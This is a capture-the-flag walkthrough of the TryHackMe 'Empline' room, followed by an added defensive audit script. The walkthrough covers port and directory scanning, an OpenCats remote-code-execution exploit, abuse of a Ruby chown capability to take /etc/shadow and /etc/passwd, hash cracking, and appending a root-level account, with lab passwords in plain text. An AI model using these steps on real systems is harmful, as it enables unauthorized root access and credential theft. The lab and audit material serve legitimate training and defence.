# Empline

**Room Link:** <https://tryhackme.com/room/empline>

### **Scans**

Initial scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/Svje3eKAWXFjV4swt52h" alt=""><figcaption></figcaption></figure>

Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/ctSDFzdiukt8M4pDwrP5" alt=""><figcaption></figcaption></figure>

## **TCP/80 - HTTP**

**Kali**

```
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
```

<figure><img src="/files/EUYsPmcMdHXh8op1dj8z" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/s1XTqMVF5kJR8flP0NPz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/CJjXWnlEwubWjK6QqXC8" alt=""><figcaption></figcaption></figure>

**Kali**

```
echo "$VICTIM job.empline.thm" >> /etc/hosts
```

<figure><img src="/files/Ya7TXYaoIu8xVDN6JWvS" alt=""><figcaption></figcaption></figure>

## Initial Shell

OpenCats 0.9.4 has an RCE exploit.

Exploit: <https://www.exploit-db.com/raw/50585>

**Kali**

```
chmod +x exploit.sh 
./exploit.sh 
./exploit.sh http://job.empline.thm/
```

<figure><img src="/files/fDERRKpcdyaq1ix1vss1" alt=""><figcaption></figcaption></figure>

**Victim**

```
getcap -r / 2>/dev/null
```

<figure><img src="/files/ZKwJ3AxES8mWvAnAMZH1" alt=""><figcaption></figcaption></figure>

**Victim**

```
ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow
```

<figure><img src="/files/OqFEXyRAvLOADBlDyBgv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HR2KbVXRD6r2XTXbZq6j" alt=""><figcaption></figcaption></figure>

**Victim**

Now that we can read both of these files we can transfer them to Kali. I let this run for a while but it wasn't cracking any hashes.

```
cat /etc/passwd
cat /etc/shadow
```

**Kali**

```
unshadow passwd shadow > passwords.txt
```

**Kali**

```
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
```

I went back to check the box and found the database credentials.

**Victim**

```
find / -name "config.php"
cat /var/www/opencats/config.php 
```

<figure><img src="/files/ntYBd33xBYCJHO2Lopsr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/i2lk2ruV9Rp5o9IKVils" alt=""><figcaption></figcaption></figure>

**Kali**

```
mysql -h $VICTIM -u james -png6pUFvsGNtw  
```

**Kali(mysql)**

```
show databases;
use opencats
show tables;  
select * from user;  
```

There were a few hashes from users so I put them in crackstation and one returned a result.

<figure><img src="/files/EJI6KRJje0Fr7uXgru8U" alt=""><figcaption></figcaption></figure>

## **TCP/22 - SSH**

**Kali**

```
ssh george@$VICTIM
Password: pretonnevippasempre
```

## Privilege Escalation

Since I already had access to change any file, I just added a new root user to passwd.

**Victim**

```
ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
```

<figure><img src="/files/SCQxTGEquq7P6X1GrebP" alt=""><figcaption></figcaption></figure>
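A defender-side audit for the three conditions this walkthrough relies on: a binary carrying a file capability found with `getcap`, changed ownership of `/etc/passwd` or `/etc/shadow`, and an appended UID-0 entry with an inline hash. This is an added example, not part of the original write-up; the function names, the list of risky capabilities and all sample data (including the binary paths) are constructed assumptions, since the room's `getcap` output appears only in a screenshot.

```shell
#!/usr/bin/env bash
# Added audit example. All sample data is constructed, not taken from the room.

# Capabilities that let a non-root process take over root-owned files or IDs.
RISKY='cap_chown|cap_fowner|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_sys_admin'

# stdin: `getcap -r /` output. Prints "path<TAB>caps" for risky entries.
# Accepts "path = cap_x+ep" (older libcap) and "path cap_x=ep" (newer libcap).
flag_caps() {
  awk -v risky="$RISKY" '{
    caps = ($2 == "=") ? $3 : $2
    if (caps ~ ("(^|,)(" risky ")([,+=]|$)")) print $1 "\t" caps
  }'
}

# stdin: passwd(5) text. Flags extra UID-0 accounts and hashes stored in field 2.
audit_passwd() {
  awk -F: '
    $3 == 0 && $1 != "root" { print "uid0\t" $1 }
    $2 ~ /^\$/              { print "inline-hash\t" $1 }'
}

# args: files that must belong to root. Prints "file<TAB>owner" otherwise (GNU stat).
not_root_owned() {
  for f in "$@"; do
    [ -e "$f" ] || continue
    owner=$(stat -c '%U' "$f" 2>/dev/null) || continue
    [ "$owner" = "root" ] || printf '%s\t%s\n' "$f" "$owner"
  done
}

# Constructed getcap output in both libcap formats (paths are hypothetical).
SAMPLE_GETCAP='/usr/bin/mtr-packet = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
/usr/bin/ping cap_net_raw=ep
/opt/tools/python3 cap_setuid,cap_net_bind_service=eip'

# Constructed passwd content; the last line mimics an appended UID-0 account.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
svc:$1$salt$CONSTRUCTEDPLACEHOLDERHASH:0:0:root:/root:/bin/bash'

printf '%s\n' "$SAMPLE_GETCAP" | flag_caps
printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
not_root_owned /etc/passwd /etc/shadow
```

On a live host, feed the functions real data with `getcap -r / 2>/dev/null | flag_caps` and `audit_passwd < /etc/passwd`.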


